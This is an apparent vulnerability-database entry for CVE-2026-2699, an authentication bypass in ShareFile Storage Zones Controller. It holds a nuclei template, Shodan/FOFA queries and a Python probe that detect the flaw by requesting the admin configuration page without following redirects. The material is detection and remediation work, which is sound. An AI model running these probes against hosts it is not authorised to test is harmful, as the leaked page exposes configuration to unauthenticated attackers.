
Progress ShareFile Storage Zones Controller - Authentication Bypass

CVE-2026-2699
Verified

Description

Customer Managed ShareFile Storage Zones Controller (SZC) contains an authentication bypass of the Execution After Redirect kind: when an unauthenticated client requests a restricted configuration page, the server issues a redirect to the login page but keeps executing the page handler, so the redirect response itself carries the full protected page. A client that simply does not follow the redirect can read and use those pages. This allows changing the system configuration and, chained with CVE-2026-2701 as described in the watchTowr write-up referenced below, potentially remote code execution.

Severity

Critical

CVSS Score

9.8

Exploit Probability

42%

Affected Product

sharefile_storage_zones_controller

Published Date

April 6, 2026

Template Author

dhiyaneshdk

CVE-2026-2699.yaml
id: CVE-2026-2699

info:
  name: Progress ShareFile Storage Zones Controller - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    Customer Managed ShareFile Storage Zones Controller (SZC) contains an authentication bypass (Execution After Redirect) that allows unauthenticated attackers to access restricted configuration pages. This leads to changing system configuration and potential remote code execution.
  impact: |
    Unauthenticated attackers can change system configuration and potentially execute remote code, leading to full system compromise.
  remediation: Update ShareFile Storage Zones Controller to version 5.12.4 or later.
  reference:
    - https://github.com/watchtowrlabs/watchTowr-vs-Progress-ShareFile-CVE-2026-2699
    - https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/
    - https://docs.sharefile.com/en-us/storage-zones-controller/5-0/security-vulnerability-feb26
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-2699
    cwe-id: CWE-284
    epss-score: 0.41586
    epss-percentile: 0.97471
  metadata:
    verified: true
    max-request: 1
    vendor: progress
    product: sharefile_storage_zones_controller
    fofa-query: title=="ShareFile Storage Server"
    shodan-query: title:"ShareFile Storage Server"
  tags: cve,cve2026,progress,sharefile,auth-bypass

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: word
        part: body
        words:
          - "ShareFile Storage Server"
        internal: true

  - raw:
      - |
        GET /ConfigService/Admin.aspx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 302'
          - 'content_length >= 10000'
        condition: and
# digest: 4a0a004730450221008f715850770456438685398d582ebe2d7f60a1ca3fad95fe4c8153d1eefc8fca02204b2a044c64a094545d048f768046e87fd1030602536bf0d623062c9dff0d1424:922c64590222798bb761d5b6d8e72950
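The template's second request encodes the whole detection: an unauthenticated GET to /ConfigService/Admin.aspx that comes back as a 302 (the login redirect) but with a body of 10,000 bytes or more, which a genuine redirect stub never has. The following Python reproduces that check outside nuclei, both against a raw captured response and as a live probe that refuses to follow redirects. This is an added example, not ProjectDiscovery's or Progress's code; the path and the byte threshold come from the template above, and the sample responses are constructed for illustration, not captured from a real ShareFile host.

```python
"""Execution-After-Redirect (EAR) check mirroring the nuclei template above.

Added example; not ProjectDiscovery's or Progress's code. The path and the
10,000-byte threshold are taken from the template; the sample responses
below are constructed, not captured from a real ShareFile host.
"""
from dataclasses import dataclass
from typing import Dict, Optional
import sys
import urllib.error
import urllib.request

ADMIN_PATH = "/ConfigService/Admin.aspx"   # restricted page probed by the template
BODY_THRESHOLD = 10_000                    # template heuristic: content_length >= 10000


@dataclass
class HttpResponse:
    status: int
    headers: Dict[str, str]   # header names lower-cased
    body: bytes


def parse_raw_response(raw: bytes) -> HttpResponse:
    """Parse a raw HTTP/1.x response into status, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    status = int(lines[0].split(b" ", 2)[1])
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return HttpResponse(status, headers, body)


def looks_like_ear(resp: HttpResponse, threshold: int = BODY_THRESHOLD) -> bool:
    """A redirect whose body is far larger than the ~150-byte "Object moved"
    stub a terminated redirect carries is the EAR signature. The body length
    is measured rather than trusting Content-Length, so chunked responses
    (where that header is absent) are judged the same way."""
    return 300 <= resp.status < 400 and len(resp.body) >= threshold


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects; urllib then surfaces the 302 as an HTTPError."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def probe(base_url: str, path: str = ADMIN_PATH, timeout: float = 10.0) -> HttpResponse:
    """Live check: fetch the admin page unauthenticated, without following redirects."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(base_url.rstrip("/") + path, method="GET")
    try:
        with opener.open(req, timeout=timeout) as r:
            return HttpResponse(r.status, {k.lower(): v for k, v in r.headers.items()}, r.read())
    except urllib.error.HTTPError as e:
        return HttpResponse(e.code, {k.lower(): v for k, v in e.headers.items()}, e.read())


def build_response(status: int, reason: str, body: bytes, location: Optional[str] = None) -> bytes:
    """Assemble a raw response whose Content-Length matches the body."""
    head = [f"HTTP/1.1 {status} {reason}"]
    if location is not None:
        head.append(f"Location: {location}")
    head += ["Content-Type: text/html; charset=utf-8", f"Content-Length: {len(body)}"]
    return ("\r\n".join(head) + "\r\n\r\n").encode("ascii") + body


LOGIN_REDIRECT = "/ConfigService/Login.aspx?ReturnUrl=%2fConfigService%2fAdmin.aspx"


def sample_patched_response() -> bytes:
    """Constructed: a redirect whose handler stopped, carrying only the stub body."""
    stub = (b"<html><head><title>Object moved</title></head><body>\r\n"
            b"<h2>Object moved to <a href=\"/ConfigService/Login.aspx\">here</a>.</h2>\r\n"
            b"</body></html>")
    return build_response(302, "Found", stub, LOGIN_REDIRECT)


def sample_ear_response() -> bytes:
    """Constructed: same redirect, but the handler kept running and rendered the page."""
    page = (b"<html><body><form id=\"form1\" action=\"Admin.aspx\">\n"
            + b"<input type=\"text\" name=\"setting\" value=\"\"/>\n" * 400
            + b"</form></body></html>")
    return build_response(302, "Found", page, LOGIN_REDIRECT)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    resp = probe(target) if target else parse_raw_response(sample_ear_response())
    print(f"status={resp.status} body={len(resp.body)} bytes "
          f"location={resp.headers.get('location')} ear={looks_like_ear(resp)}")
```

Run it with a base URL (`python ear_check.py https://szc.example/`) to probe a host, or with no argument to see the verdict on the constructed vulnerable response. A host that answers with a 302 and only the short "Object moved" stub is behaving as a terminated redirect should; a 302 carrying the full page is the condition the template flags. The probe disables redirect following on purpose: a client that follows the 302 lands on the login page and never sees the leaked body, which is exactly why the bypass goes unnoticed in a browser.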
Score

9.8

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2026-2699
CWE ID:
CWE-284

References

https://github.com/watchtowrlabs/watchTowr-vs-Progress-ShareFile-CVE-2026-2699
https://labs.watchtowr.com/youre-not-supposed-to-sharefile-with-everyone-progress-sharefile-pre-auth-rce-chain-cve-2026-2699-cve-2026-2701/
https://docs.sharefile.com/en-us/storage-zones-controller/5-0/security-vulnerability-feb26

Remediation Steps

Update ShareFile Storage Zones Controller to version 5.12.4 or later. To confirm the fix, request /ConfigService/Admin.aspx without a session and without following redirects: a patched instance should answer with a short redirect to the login page, not a 302 whose body is the full configuration page.